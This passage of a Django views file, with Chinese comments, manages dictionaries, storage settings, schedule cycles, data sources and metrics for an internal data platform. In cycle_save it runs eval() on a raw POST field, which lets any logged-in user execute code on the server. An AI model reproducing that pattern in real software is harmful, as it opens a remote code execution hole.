DictList.objects.filter(name=listname).filter(dictindex=alldict).exclude(id=listid).exclude(\n state=\"9\")\n if (len(alllist) > 0):\n result[\"res\"] = listname + '已存在。'\n else:\n try:\n listsave = DictList.objects.get(id=listid)\n listsave.name = listname\n listsave.sort = listsort\n listsave.save()\n result[\"res\"] = \"修改成功。\"\n except:\n result[\"res\"] = \"修改失败。\"\n return HttpResponse(json.dumps(result))\n\n\ndef dictdel(request):\n if 'dictid' in request.POST:\n result = \"\"\n dictid = request.POST.get('dictid', '')\n try:\n dictid = int(dictid.replace(\"dict_\", \"\"))\n except:\n raise Http404()\n alldict = DictIndex.objects.filter(id=dictid)\n if (len(alldict) > 0):\n dictsave = alldict[0]\n dictsave.state = \"9\"\n dictsave.save()\n result = \"删除成功。\"\n else:\n result = '字典不存在。'\n return HttpResponse(result)\n\n\ndef dictlistdel(request):\n if 'listid' in request.POST:\n result = \"\"\n listid = request.POST.get('listid', '')\n try:\n listid = int(listid.replace(\"list_\", \"\"))\n except:\n raise Http404()\n alllist = DictList.objects.filter(id=listid)\n if (len(alllist) > 0):\n listsave = alllist[0]\n listsave.state = \"9\"\n listsave.save()\n result = \"删除成功。\"\n else:\n result = '条目不存在。'\n return HttpResponse(result)\n\n\ndef storage_index(request, funid):\n \"\"\"\n 存储配置\n \"\"\"\n if request.user.is_authenticated():\n storage_type_list = []\n valid_time_list = []\n\n dict_list = DictList.objects.exclude(state='9', dictindex__state='9').values(\n 'id', 'name', 'dictindex__id'\n )\n\n for dl in dict_list:\n if dl['dictindex__id'] == 4:\n # 存储类型\n storage_type_list.append({\n \"storage_name\": dl['name'],\n \"storage_type_id\": dl['id'],\n })\n if dl['dictindex__id'] == 3:\n # 有效时间\n valid_time_list.append({\n \"valid_time\": dl['name'],\n \"valid_time_id\": dl['id'],\n })\n\n return render(request, 'storage.html',\n {'username': request.user.userinfo.fullname,\n \"storage_type_list\": storage_type_list,\n \"valid_time_list\": valid_time_list,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef storage_data(request):\n if request.user.is_authenticated():\n result = []\n all_storage = Storage.objects.exclude(state=\"9\").order_by(\"sort\")\n\n all_dict_list = DictList.objects.exclude(\n state='9').values('id', 'name')\n\n for storage in all_storage:\n storage_type = storage.storagetype\n storage_type_display = \"\"\n for dict in all_dict_list:\n if storage_type == str(dict['id']):\n storage_type_display = dict['name']\n break\n\n validtime = storage.validtime\n try:\n validtime_dict_list = DictList.objects.filter(id=int(storage.validtime))\n if validtime_dict_list.exists():\n validtime_dict_list = validtime_dict_list[0]\n validtime = validtime_dict_list.name\n except:\n pass\n\n result.append({\n \"id\": storage.id,\n \"name\": storage.name,\n \"tablename\": storage.tablename,\n \"storagetype_num\": storage_type,\n \"validtime_num\": storage.validtime,\n \"storagetype\": storage_type_display,\n \"validtime\": validtime,\n \"sort\": storage.sort,\n })\n return JsonResponse({\"data\": result})\n\n\ndef storage_save(request):\n if request.user.is_authenticated():\n id = request.POST.get(\"id\", \"\")\n storage_name = request.POST.get(\"storage_name\", \"\")\n table_name = request.POST.get(\"table_name\", \"\")\n storage_type = request.POST.get(\"storage_type\", \"\")\n valid_time = request.POST.get(\"valid_time\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n\n try:\n id = int(id)\n except:\n raise Http404()\n\n result = {}\n\n if storage_name.strip() == '':\n result[\"res\"] = '存储名称不能为空。'\n else:\n\n if table_name.strip() == '':\n result[\"res\"] = '数据库表名不能为空。'\n else:\n if storage_type.strip() == '':\n result[\"res\"] = '存储类型不能为空。'\n else:\n if valid_time.strip() == '':\n result[\"res\"] = '有效时间不能为空。'\n else:\n if id == 0:\n all_storage = Storage.objects.filter(\n name=storage_name).exclude(state=\"9\")\n if (len(all_storage) > 0):\n result[\"res\"] = '存储名称:' + \\\n storage_name + '已存在。'\n else:\n try:\n storage_save = Storage()\n storage_save.name = storage_name\n storage_save.tablename = table_name\n storage_save.storagetype = storage_type\n storage_save.validtime = valid_time\n storage_save.sort = sort if sort else None\n storage_save.save()\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = storage_save.id\n except Exception as e:\n print(e)\n result[\"res\"] = \"保存失败。\"\n else:\n all_storage = Storage.objects.filter(name=storage_name).exclude(\n id=id).exclude(state=\"9\")\n if (len(all_storage) > 0):\n result[\"res\"] = '存储名称:' + \\\n storage_name + '已存在。'\n else:\n try:\n storage_save = Storage.objects.get(\n id=id)\n storage_save.name = storage_name\n storage_save.tablename = table_name\n storage_save.storagetype = storage_type\n storage_save.validtime = valid_time\n storage_save.sort = int(\n sort) if sort else None\n storage_save.save()\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = storage_save.id\n except:\n result[\"res\"] = \"修改失败。\"\n return JsonResponse(result)\n\n\ndef storage_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n storage = Storage.objects.get(id=id)\n storage.state = \"9\"\n storage.save()\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef cycle_index(request, funid):\n \"\"\"\n 周期配置\n \"\"\"\n if request.user.is_authenticated():\n return render(request, 'cycle.html',\n {'username': request.user.userinfo.fullname,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef cycle_data(request):\n if request.user.is_authenticated():\n result = []\n\n all_cycle = Cycle.objects.exclude(state=\"9\").order_by(\"sort\")\n for cycle in all_cycle:\n schedule_type = cycle.schedule_type\n schedule_type_display = cycle.get_schedule_type_display()\n\n sub_cycles = cycle.subcycle_set.exclude(state=\"9\")\n sub_cycle_data = []\n for sc in sub_cycles:\n sub_cycle_data.append({\n \"sub_cycle_id\": sc.id,\n \"minutes\": sc.minute,\n \"hours\": sc.hour,\n \"per_week\": sc.day_of_week,\n \"per_month\": sc.day_of_month,\n \"per_hour\": sc.min_of_hour,\n })\n\n result.append({\n \"id\": cycle.id,\n \"name\": cycle.name,\n \"sort\": cycle.sort,\n \"schedule_type\": schedule_type,\n \"schedule_type_display\": schedule_type_display,\n \"sub_cycle_data\": sub_cycle_data\n })\n\n return JsonResponse({\"data\": result})\n\n\ndef cycle_save(request):\n if request.user.is_authenticated():\n id = request.POST.get(\"id\", \"\")\n cycle_name = request.POST.get(\"cycle_name\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n\n schedule_type = request.POST.get('schedule_type', '')\n\n sub_cycle = eval(request.POST.get('sub_cycle', '[]'))\n # [{'hours': '0', 'minutes': '00', 'per_month': '324', 'per_week': '', 'sub_cycle_id': '暂无'}]\n try:\n id = int(id)\n except:\n raise Http404()\n result = {}\n\n if cycle_name.strip() == '':\n result[\"res\"] = '周期名称不能为空。'\n else:\n # 周期类型\n try:\n schedule_type = int(schedule_type)\n except ValueError as e:\n return JsonResponse({\n \"res\": \"周期类型未选择。\"\n })\n if id == 0:\n all_cycle = Cycle.objects.filter(\n name=cycle_name).exclude(state=\"9\")\n if (len(all_cycle) > 0):\n result[\"res\"] = '存储代码:' + cycle_name + '已存在。'\n else:\n try:\n with transaction.atomic():\n cycle_save = Cycle()\n cycle_save.name = cycle_name\n cycle_save.schedule_type = schedule_type\n cycle_save.sort = int(sort) if sort else None\n cycle_save.save()\n for sc in sub_cycle:\n sc_data = {\n \"hour\": sc[\"hours\"],\n \"minute\": sc[\"minutes\"],\n \"day_of_week\": sc[\"per_week\"],\n \"day_of_month\": sc[\"per_month\"],\n \"min_of_hour\": sc[\"per_hour\"],\n }\n cycle_save.subcycle_set.create(**sc_data)\n except Exception as e:\n result[\"res\"] = \"保存失败:{0}\".format(e)\n else:\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = cycle_save.id\n else:\n all_cycle = Cycle.objects.filter(name=cycle_name).exclude(\n id=id).exclude(state=\"9\")\n if (len(all_cycle) > 0):\n result[\"res\"] = '存储名称:' + cycle_name + '已存在。'\n else:\n try:\n with transaction.atomic():\n cycle_save = Cycle.objects.get(id=id)\n cycle_save.name = cycle_name\n cycle_save.schedule_type = schedule_type\n cycle_save.sort = int(\n sort) if sort else None\n cycle_save.save()\n\n # 删除原有而后不存在的\n # 原有的ID与现在的ID校对 ID不存在的删除\n sc_id_list = [int(sc[\"sub_cycle_id\"]) for sc in sub_cycle if sc[\"sub_cycle_id\"] != \"暂无\"]\n existed_sub_cycles = cycle_save.subcycle_set.exclude(state=\"9\")\n for esc in existed_sub_cycles:\n if esc.id not in sc_id_list:\n esc.state = \"9\"\n esc.save()\n\n for sc in sub_cycle:\n sc_data = {\n \"hour\": sc[\"hours\"],\n \"minute\": sc[\"minutes\"],\n \"day_of_week\": sc[\"per_week\"],\n \"day_of_month\": sc[\"per_month\"],\n \"min_of_hour\": sc[\"per_hour\"],\n }\n # add/edit\n if sc[\"sub_cycle_id\"] == \"暂无\":\n cycle_save.subcycle_set.create(**sc_data)\n else:\n sub_cycle_id = int(sc[\"sub_cycle_id\"])\n SubCycle.objects.exclude(state=\"9\").filter(id=sub_cycle_id).update(**sc_data)\n except Exception as e:\n print(e)\n result[\"res\"] = \"修改失败:{0}\".format(e)\n else:\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = cycle_save.id\n return JsonResponse(result)\n\n\ndef cycle_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n cycle = Cycle.objects.get(id=id)\n cycle.state = \"9\"\n cycle.save()\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef get_select_source_type(temp_source_type=None):\n try:\n temp_source_type = int(temp_source_type)\n except:\n pass\n c_dict_index = DictIndex.objects.filter(id=2).exclude(state='9')\n if c_dict_index.exists():\n c_dict_index = c_dict_index[0]\n dict_list = c_dict_index.dictlist_set.exclude(state=\"9\")\n source_type_list = []\n for i in dict_list:\n source_type_list.append({\n \"source_type_id\": i.id,\n \"source_type\": i.name,\n \"source_if_selected\": \"selected\" if temp_source_type == i.id else \"\",\n })\n else:\n source_type_list = []\n return source_type_list\n\n\ndef source_index(request, funid):\n \"\"\"\n 数据源配置\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n try:\n errors = []\n selectid = \"\"\n id = \"\"\n pid = \"\"\n title = \"\"\n code = \"\"\n name = \"\"\n connection = \"\"\n\n hiddendiv = \"hidden\"\n # 数据源类型\n source_type_list = get_select_source_type()\n\n # 新增/保存/修改\n if request.method == \"POST\":\n hiddendiv = \"\"\n id = request.POST.get('id', '')\n pid = request.POST.get('pid', '')\n name = request.POST.get('name', '')\n code = request.POST.get('code', '')\n connection = request.POST.get('connection', '')\n sourcetype = request.POST.get('sourcetype', '')\n\n source_type_list = get_select_source_type(\n temp_source_type=sourcetype)\n\n try:\n id = int(id)\n except:\n raise Http404()\n try:\n pid = int(pid)\n except:\n raise Http404()\n if id == 0:\n selectid = pid\n title = \"新建\"\n else:\n selectid = id\n title = name\n\n if code.strip() == '':\n errors.append('数据源代码不能为空。')\n else:\n if name.strip() == '':\n errors.append('数据源名称不能为空。')\n else:\n if connection.strip() == '':\n errors.append('连接符不能为空。')\n else:\n if sourcetype.strip() == '':\n errors.append('数据源类型不能为空。')\n else:\n try:\n # 新增步骤\n if id == 0:\n try:\n pid = int(pid)\n except:\n pid = None\n max_sort_from_pnode = \\\n Source.objects.exclude(state=\"9\").filter(type='').filter(\n pnode_id=None).aggregate(\n Max(\"sort\"))[\n \"sort__max\"]\n else:\n max_sort_from_pnode = \\\n Source.objects.exclude(state=\"9\").filter(type='').filter(\n pnode_id=pid).aggregate(\n Max(\"sort\"))[\n \"sort__max\"]\n\n # 当前没有父节点\n if max_sort_from_pnode or max_sort_from_pnode == 0:\n my_sort = max_sort_from_pnode + 1\n else:\n my_sort = 0\n\n source = Source()\n source.name = name\n source.connection = connection\n source.code = code\n source.sort = my_sort\n source.sourcetype = sourcetype\n source.pnode_id = pid\n source.save()\n\n id = source.id\n title = name\n selectid = id\n else:\n source = Source.objects.filter(id=id)\n if source.exists():\n source = source[0]\n source.name = name\n source.code = code\n source.connection = connection\n source.sourcetype = sourcetype\n source.save()\n\n title = name\n else:\n errors.append(\n \"当前资源不存在,无法修改,请联系客服!\")\n except:\n errors.append('保存失败。')\n\n # 加载树\n treedata = []\n rootnodes = Source.objects.order_by(\n \"sort\").filter(pnode=None).exclude(state=\"9\").filter(type='')\n\n if len(rootnodes) > 0:\n for rootnode in rootnodes:\n root = dict()\n root[\"text\"] = rootnode.name\n root[\"id\"] = rootnode.id\n\n root[\"data\"] = {\n \"code\": rootnode.code,\n \"sourcetype\": rootnode.sourcetype,\n \"connection\": rootnode.connection,\n \"sort\": rootnode.sort,\n \"verify\": \"first_node\",\n }\n root[\"children\"] = get_source_tree(\n rootnode, selectid)\n root[\"state\"] = {\"opened\": True}\n treedata.append(root)\n\n treedata = json.dumps(treedata)\n return render(request, 'source.html',\n {'username': request.user.userinfo.fullname,\n \"treedata\": treedata,\n \"title\": title,\n \"errors\": errors,\n \"source_type_list\": source_type_list,\n # 表单默认数据\n \"hiddendiv\": hiddendiv,\n \"id\": id,\n \"pid\": pid,\n \"code\": code,\n \"name\": name,\n \"connection\": connection,\n \"pagefuns\": getpagefuns(funid,request)})\n except Exception as e:\n print(e)\n return HttpResponseRedirect(\"/index\")\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef get_source_tree(parent, selectid):\n nodes = []\n children = parent.children.exclude(state=\"9\").order_by(\"sort\").exclude(state=\"9\")\n for child in children:\n node = dict()\n node[\"text\"] = child.name\n node[\"id\"] = child.id\n node[\"children\"] = get_source_tree(child, selectid)\n node[\"data\"] = {\n \"code\": child.code,\n \"sourcetype\": child.sourcetype,\n \"connection\": child.connection,\n \"sort\": child.sort,\n }\n try:\n if int(selectid) == child.id:\n node[\"state\"] = {\"selected\": True}\n except:\n pass\n nodes.append(node)\n return nodes\n\n\ndef del_source(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n all_source = Source.objects.filter(id=id)\n if all_source.exists():\n all_source = all_source[0]\n sort = all_source.sort\n p_source = all_source.pnode\n all_source.state = 9\n all_source.save()\n sort_source = Source.objects.filter(pnode=p_source).filter(\n sort__gt=sort).exclude(state=\"9\").filter(type='')\n if sort_source.exists():\n for sortstep in sort_source:\n try:\n sortstep.sort = sortstep.sort - 1\n sortstep.save()\n except:\n pass\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef move_source(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n parent = request.POST.get('parent', '')\n old_parent = request.POST.get('old_parent', '')\n old_position = request.POST.get('old_position', '')\n position = request.POST.get('position', '')\n try:\n id = int(id)\n except:\n raise Http404()\n try:\n parent = int(parent)\n except:\n parent = None\n try:\n old_parent = int(old_parent)\n except:\n old_parent = None\n try:\n old_position = int(old_position)\n except:\n raise Http404()\n try:\n position = int(position)\n except:\n raise Http404()\n\n cur_source_obj = \\\n Source.objects.filter(pnode_id=old_parent).filter(\n sort=old_position).exclude(state=\"9\").filter(type='')[0]\n cur_source_obj.sort = position\n cur_source_id = cur_source_obj.id\n cur_source_obj.save()\n # 同一pnode\n if parent == old_parent:\n # 向上拽\n source_under_pnode = Source.objects.filter(pnode_id=old_parent).exclude(state=\"9\").filter(\n sort__gte=position,\n sort__lt=old_position).exclude(id=cur_source_id).filter(type='')\n for source in source_under_pnode:\n source.sort += 1\n source.save()\n\n # 向下拽\n source_under_pnode = Source.objects.filter(pnode_id=old_parent).exclude(state=\"9\").filter(\n sort__gt=old_position, sort__lte=position).exclude(id=cur_source_id).filter(type='')\n for source in source_under_pnode:\n source.sort -= 1\n source.save()\n\n # 向其他节点拽\n else:\n # 原来pnode下\n old_source = Source.objects.filter(pnode_id=old_parent).exclude(state=\"9\").filter(\n sort__gt=old_position).exclude(id=cur_source_id).filter(type='')\n for step in old_source:\n step.sort -= 1\n step.save()\n # 后来pnode下\n cur_source = Source.objects.filter(pnode_id=parent).exclude(state=\"9\").filter(\n sort__gte=position).exclude(\n id=cur_source_id).filter(type='')\n for source in cur_source:\n source.sort += 1\n source.save()\n # pnode\n if parent:\n parent_source = Source.objects.get(id=parent)\n else:\n parent_source = None\n mystep = Source.objects.get(id=id)\n try:\n mystep.pnode = parent_source\n mystep.save()\n except:\n pass\n\n if parent != old_parent:\n if parent == None:\n return HttpResponse(\" ^ \")\n else:\n return HttpResponse(parent_source.name + \"^\" + str(parent_source.id))\n else:\n return HttpResponse(\"0\")\n\n\ndef target_index(request, funid):\n \"\"\"\n 指标管理\n 过滤条件:\n 管理应用\n 查询应用\n\n 操作类型\n 周期类型\n 业务类型\n 机组 unit\n\n DictIndex 字典名称 >> DictList 字典条目\n \"\"\"\n if request.user.is_authenticated():\n app_list = []\n operation_type_list = []\n cycle_type_list = []\n business_type_list = []\n unit_list = []\n source_list = []\n cycle_list = []\n storage_list = []\n\n applist = App.objects.all().exclude(state='9')\n for i in applist:\n # 业务\n works = i.work_set.exclude(state='9').values('id', 'name', 'core')\n\n app_list.append({\n \"app_name\": i.name,\n \"app_id\": i.id,\n \"works\": works,\n })\n\n c_dict_index_1 = DictIndex.objects.filter(\n id=1).exclude(state='9')\n if c_dict_index_1.exists():\n c_dict_index_1 = c_dict_index_1[0]\n dict_list1 = c_dict_index_1.dictlist_set.exclude(state=\"9\")\n for i in dict_list1:\n operation_type_list.append({\n \"operation_type_name\": i.name,\n \"operation_type_id\": i.id,\n })\n\n c_dict_index_2 = DictIndex.objects.filter(\n id=12).exclude(state='9')\n if c_dict_index_2.exists():\n c_dict_index_2 = c_dict_index_2[0]\n dict_list2 = c_dict_index_2.dictlist_set.exclude(state=\"9\")\n for i in dict_list2:\n cycle_type_list.append({\n \"cycle_type_name\": i.name,\n \"cycle_type_id\": i.id,\n })\n\n c_dict_index_3 = DictIndex.objects.filter(\n id=5).exclude(state='9')\n if c_dict_index_3.exists():\n c_dict_index_3 = c_dict_index_3[0]\n dict_list3 = c_dict_index_3.dictlist_set.exclude(state=\"9\")\n for i in dict_list3:\n business_type_list.append({\n \"business_type_name\": i.name,\n \"business_type_id\": i.id,\n })\n\n c_dict_index_4 = DictIndex.objects.filter(\n id=6).exclude(state='9')\n if c_dict_index_4.exists():\n c_dict_index_4 = c_dict_index_4[0]\n dict_list4 = c_dict_index_4.dictlist_set.exclude(state=\"9\")\n for i in dict_list4:\n unit_list.append({\n \"unit_name\": i.name,\n \"unit_id\": i.id,\n })\n sourcelist = Source.objects.all().exclude(state='9').exclude(pnode=None).filter(type='')\n for i in sourcelist:\n source_list.append({\n \"source_name\": i.name,\n \"source_id\": i.id,\n })\n\n cyclelist = Cycle.objects.all().exclude(state='9')\n for i in cyclelist:\n cycle_list.append({\n \"cycle_name\": i.name,\n \"cycle_id\": i.id,\n })\n\n storagelist = Storage.objects.all().exclude(state='9')\n\n all_dict_list = DictList.objects.exclude(state='9').values('id', 'name')\n\n for i in storagelist:\n storage_type = i.storagetype\n storage_type_display = \"\"\n for dict in all_dict_list:\n if storage_type == str(dict['id']):\n storage_type_display = dict['name']\n break\n\n storage_list.append({\n \"storage_name\": i.name,\n \"storage_id\": i.id,\n 'storage_type': storage_type_display,\n \"tablename\": i.tablename,\n })\n\n # 加权指标\n weight_targets = Target.objects.exclude(state='9').values('id', 'name', 'code')\n return render(request, 'target.html',\n {'username': request.user.userinfo.fullname,\n \"app_list\": app_list,\n \"operation_type_list\": operation_type_list,\n \"cycle_type_list\": cycle_type_list,\n \"business_type_list\": business_type_list,\n \"unit_list\": unit_list,\n \"source_list\": source_list,\n \"cycle_list\": cycle_list,\n \"storage_list\": storage_list,\n \"weight_targets\": weight_targets,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef load_weight_targets(request):\n if request.user.is_authenticated():\n app_id = request.POST.get('app_id', '')\n weight_target_list = []\n try:\n app_id = int(app_id)\n except:\n # 加权指标\n weight_targets = Target.objects.exclude(state='9').values('id', 'name', 'code')\n else:\n weight_targets = Target.objects.filter(adminapp_id=app_id).exclude(state='9').values('id', 'name', 'code')\n\n weight_target_list = [{\"id\": w['id'], \"text\": \"{name}({code})\".format(name=w['name'], code=w['code'])} for w in\n weight_targets]\n return JsonResponse({'data': str(weight_target_list)})\n else:\n return HttpResponseRedirect('/login')\n\n\ndef target_data(request):\n if request.user.is_authenticated():\n result = []\n search_adminapp = request.GET.get('search_adminapp', '')\n search_app = request.GET.get('search_app', '')\n search_operationtype = request.GET.get('search_operationtype', '')\n search_cycletype = request.GET.get('search_cycletype', '')\n search_businesstype = request.GET.get('search_businesstype', '')\n search_unit = request.GET.get('search_unit', '')\n search_app_noselect = request.GET.get('search_app_noselect', '')\n datatype = request.GET.get('datatype', '')\n works = request.GET.get('works', '')\n search_cumulative = request.GET.get('search_cumulative', '')\n\n all_target = Target.objects.exclude(state=\"9\").order_by(\"sort\").select_related(\n \"adminapp\", \"storage\", \"work\"\n ).prefetch_related('app')\n if search_adminapp != \"\":\n if search_adminapp == 'null':\n all_target = all_target.filter(adminapp=None)\n else:\n curadminapp = App.objects.get(id=int(search_adminapp))\n all_target = all_target.filter(adminapp=curadminapp)\n if search_app != \"\":\n curadminapp = App.objects.get(id=int(search_app))\n curapp = App.objects.filter(id=int(search_app))\n all_target = all_target.exclude(adminapp=curadminapp).filter(app__in=curapp)\n\n try:\n search_app_noselect = int(search_app_noselect)\n except:\n pass\n else:\n # 过滤查询指标\n # 剔除当前核心业务的指标\n all_target = all_target.filter((~Q(adminapp__id=search_app_noselect) & ~Q(app__id=search_app_noselect)) | (\n (~Q(work__core='是') & ~Q(app__id=search_app_noselect) & Q(adminapp__id=search_app_noselect))))\n\n if search_operationtype != \"\":\n all_target = all_target.filter(operationtype=search_operationtype)\n if search_cycletype != \"\":\n all_target = all_target.filter(cycletype=search_cycletype)\n if search_businesstype != \"\":\n all_target = all_target.filter(businesstype=search_businesstype)\n if search_unit != \"\":\n all_target = all_target.filter(unit=search_unit)\n if datatype != \"\":\n all_target = all_target.filter(datatype=datatype)\n if search_cumulative != \"\":\n all_target = all_target.filter(cumulative=search_cumulative)\n try:\n works = int(works)\n all_target = all_target.filter(work_id=works)\n except:\n pass\n\n all_dict_list = DictList.objects.exclude(state='9').values('id', 'name')\n all_works = Work.objects.exclude(state='9').values('id', 'name', 'app_id')\n\n for target in all_target:\n operationtype = target.operationtype\n if operationtype:\n for dict in all_dict_list:\n if operationtype == str(dict['id']):\n operationtype = dict['name']\n break\n\n cycletype = target.cycletype\n if cycletype:\n for dict in all_dict_list:\n if cycletype == str(dict['id']):\n cycletype = dict['name']\n break\n\n businesstype = target.businesstype\n if businesstype:\n for dict in all_dict_list:\n if businesstype == str(dict['id']):\n businesstype = dict['name']\n break\n\n unit = target.unit\n if unit:\n for dict in all_dict_list:\n if unit == str(dict['id']):\n unit = dict['name']\n break\n\n # 查询应用\n applist = []\n for my_app in target.app.all():\n applist.append(my_app.id)\n\n adminapp_name = \"\"\n try:\n adminapp_name = target.adminapp.name\n except:\n pass\n\n # 存储类型\n storage_type_display = \"\"\n storage = target.storage\n if storage:\n storage_type = storage.storagetype\n if storage_type:\n for dict in all_dict_list:\n if storage_type == str(dict['id']):\n storage_type_display = dict['name']\n break\n\n # 根据adminapp过滤出业务,并选中的业务\n work_selected = target.work.id if target.work else ''\n work_selected_name = target.work.name if target.work else ''\n admin_app = target.adminapp\n if admin_app:\n works = [work for work in all_works if work['app_id'] == admin_app.id]\n\n result.append({\n \"operationtype_name\": operationtype,\n \"cycletype_name\": cycletype,\n \"businesstype_name\": businesstype,\n \"unit_name\": unit,\n \"adminapp_name\": adminapp_name,\n \"id\": target.id,\n \"name\": target.name,\n \"code\": target.code,\n \"operationtype\": target.operationtype,\n \"cycletype\": target.cycletype,\n \"businesstype\": target.businesstype,\n \"unit\": target.unit,\n \"adminapp\": target.adminapp_id,\n \"app\": applist,\n \"magnification\": target.magnification,\n \"digit\": target.digit,\n \"datatype\": target.datatype,\n \"cumulative\": target.cumulative,\n \"weight_target\": target.weight_target.id if target.weight_target else '',\n\n \"upperlimit\": target.upperlimit,\n \"lowerlimit\": target.lowerlimit,\n \"formula\": target.formula,\n \"cycle\": target.cycle_id if target.cycle_id else \"\",\n \"source\": target.source_id,\n \"source_content\": target.source_content,\n \"storage\": target.storage_id,\n\n # 行、列判断是否展示存储标识\n \"storage_type\": storage_type_display,\n\n \"storagefields\": target.storagefields,\n \"storagetag\": target.storagetag,\n \"sort\": target.sort,\n \"state\": target.state,\n \"remark\": target.remark,\n\n 'work_selected': work_selected,\n 'work_selected_name': work_selected_name,\n 'works': str(works),\n \"unity\": target.unity,\n \"is_repeat\": target.is_repeat,\n \"data_from\": target.data_from,\n\n \"if_push\": target.if_push,\n # \"push_config\": json.dumps(target.push_config if target.push_config else {}),\n \"push_config\": target.push_config.replace('\"', '\\\\\\\"').replace(\"\\'\", '\"') if target.push_config else \"\",\n # \"push_config\": target.push_config.replace('\"', '\\\"') if target.push_config else \"\",\n \"is_select\": target.is_select,\n \"warn_range\": target.warn_range\n })\n return JsonResponse({\"data\": result})\n\n\ndef target_formula_data(request):\n if request.user.is_authenticated():\n all_target = Target.objects.exclude(state=\"9\")\n all_constant = Constant.objects.exclude(state=\"9\")\n formula_analysis_data = {}\n for target in all_target:\n analysis_code = target.code\n analysis_name = target.name\n formula_analysis_data[analysis_code] = analysis_name\n for constant in all_constant:\n analysis_code = constant.code\n analysis_name = constant.name\n formula_analysis_data[analysis_code] = analysis_name\n return HttpResponse(json.dumps(formula_analysis_data, ensure_ascii=False))\n\n\ndef target_save(request):\n if request.user.is_authenticated():\n id = request.POST.get(\"id\", \"\")\n name = request.POST.get(\"name\", \"\")\n code = request.POST.get(\"code\", \"\")\n operationtype = request.POST.get(\"operationtype\", \"\")\n cycletype = request.POST.get(\"cycletype\", \"\")\n businesstype = request.POST.get(\"businesstype\", \"\")\n unit = request.POST.get(\"unit\", \"\")\n\n adminapp = request.POST.get(\"adminapp\", \"\")\n app_list = request.POST.getlist('app[]')\n datatype = request.POST.get(\"datatype\", \"\")\n magnification = request.POST.get(\"magnification\", \"\")\n digit = request.POST.get(\"digit\", \"\")\n upperlimit = request.POST.get(\"upperlimit\", \"\")\n lowerlimit = request.POST.get(\"lowerlimit\", \"\")\n cumulative = request.POST.get(\"cumulative\", \"\")\n weight_target = request.POST.get(\"weight_target\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n\n formula = request.POST.get(\"formula\", \"\")\n\n cycle = request.POST.get(\"cycle\", \"\")\n source = request.POST.get(\"source\", \"\")\n\n source_content = request.POST.get(\"source_content\", \"\")\n\n storage = request.POST.get(\"storage\", \"\")\n storagetag = request.POST.get(\"storagetag\", \"\")\n storagefields = request.POST.get(\"storagefields\", \"\")\n\n is_repeat = request.POST.get(\"is_repeat\", \"\")\n savetype = request.POST.get(\"savetype\", \"\")\n\n works = request.POST.get('works', '')\n unity = request.POST.get('unity', '')\n\n data_from = request.POST.get('data_from', '')\n calculate_source = request.POST.get('calculate_source', '')\n calculate_content = request.POST.get('calculate_content', '')\n\n if_push = request.POST.get('if_push', '')\n push_config = request.POST.get('push_config', '')\n is_select = request.POST.get('is_select', '')\n warn_range = request.POST.get('warn_range', '')\n\n try:\n push_config = json.loads(push_config)\n except:\n pass\n # {'dest_fields': ['b', 'd', 'werwer'], 'origin_source': '2', 'constraint_fields': ['rfe'], 'dest_table': 'reffa', 'origin_fields': ['a', 'c', 'wewer']}\n\n all_app = App.objects.exclude(state=\"9\")\n all_cycle = Cycle.objects.exclude(state=\"9\")\n all_source = Source.objects.exclude(state=\"9\").filter(type='')\n all_storage = Storage.objects.exclude(state=\"9\")\n\n try:\n id = int(id)\n except:\n raise Http404()\n\n result = {}\n\n if not name.strip():\n result[\"res\"] = '指标名称不能为空。'\n elif not code.strip():\n result[\"res\"] = '指标代码不能为空。'\n elif not operationtype.strip():\n result[\"res\"] = '操作类型不能为空。'\n elif not cycletype.strip():\n result[\"res\"] = '周期类型不能为空。'\n elif not businesstype.strip():\n result[\"res\"] = '业务类型不能为空。'\n elif not unit.strip():\n result[\"res\"] = '机组不能为空。'\n elif not datatype.strip():\n result[\"res\"] = '数据类型不能为空。'\n else:\n if datatype.strip() == 'numbervalue':\n if not magnification:\n result[\"res\"] = '数据类型为数值时,倍率不能为空。'\n return JsonResponse(result)\n if not digit:\n result[\"res\"] = '数据类型为数值时,保留位数不能为空。'\n return JsonResponse(result)\n if operationtype == '17' and not data_from:\n result[\"res\"] = '操作类型为数据计算时,必须选择数据来源。'\n else:\n if id == 0:\n all_target = Target.objects.filter(code=code).exclude(state=\"9\")\n all_constant = Constant.objects.filter(code=code).exclude(state=\"9\")\n if (len(all_target) > 0):\n result[\"res\"] = '指标代码:' + \\\n code + '已存在。'\n else:\n if (len(all_constant) > 0):\n result[\"res\"] = '常数库内已存在:' + code + '。'\n else:\n target_save = Target()\n target_save.name = name\n target_save.code = code\n target_save.operationtype = operationtype\n target_save.cycletype = cycletype\n target_save.businesstype = businesstype\n target_save.unit = unit\n target_save.unity = unity\n target_save.is_select = is_select\n if data_from:\n target_save.data_from = data_from\n\n # 业务\n try:\n works = int(works)\n except:\n pass\n else:\n target_save.work_id = works\n\n if datatype == 'numbervalue':\n try:\n target_save.magnification = float(magnification)\n except:\n pass\n try:\n target_save.digit = int(digit)\n except:\n pass\n try:\n target_save.upperlimit = float(upperlimit)\n except:\n pass\n try:\n target_save.lowerlimit = float(lowerlimit)\n except:\n pass\n target_save.cumulative = 